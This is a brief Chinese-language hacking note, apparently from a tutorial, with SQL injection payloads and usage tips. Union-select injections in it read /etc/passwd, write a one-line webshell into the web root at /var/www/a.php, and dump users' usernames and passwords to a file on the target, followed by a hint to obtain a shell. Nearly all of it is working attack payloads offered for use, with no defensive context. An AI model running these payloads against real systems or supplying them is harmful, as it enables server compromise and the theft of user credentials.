读取文件

’ union SELECT null, load_file(’/etc/passwd’)–+ 注意：不要忘了–后有空格，否则语法错误

写文件

’ union select null,“写入的内容” INTO DUMPFILE “/var/
www/a.php” --+ 注意：不要忘了–后有空格，否则语法错误
我们可以将一句话木马写入对面系统。
这里看下原笔迹的一个例子。

保存下载数据库

**’ union select null, concat(user,0x3a,password) from users INTO OUTFILE ‘/
tmp/a.db’-- **将数据库内容写入目标机器的/tmp/a.db。然后再想办法 获取shell，在屏幕上查看内容！复制下来。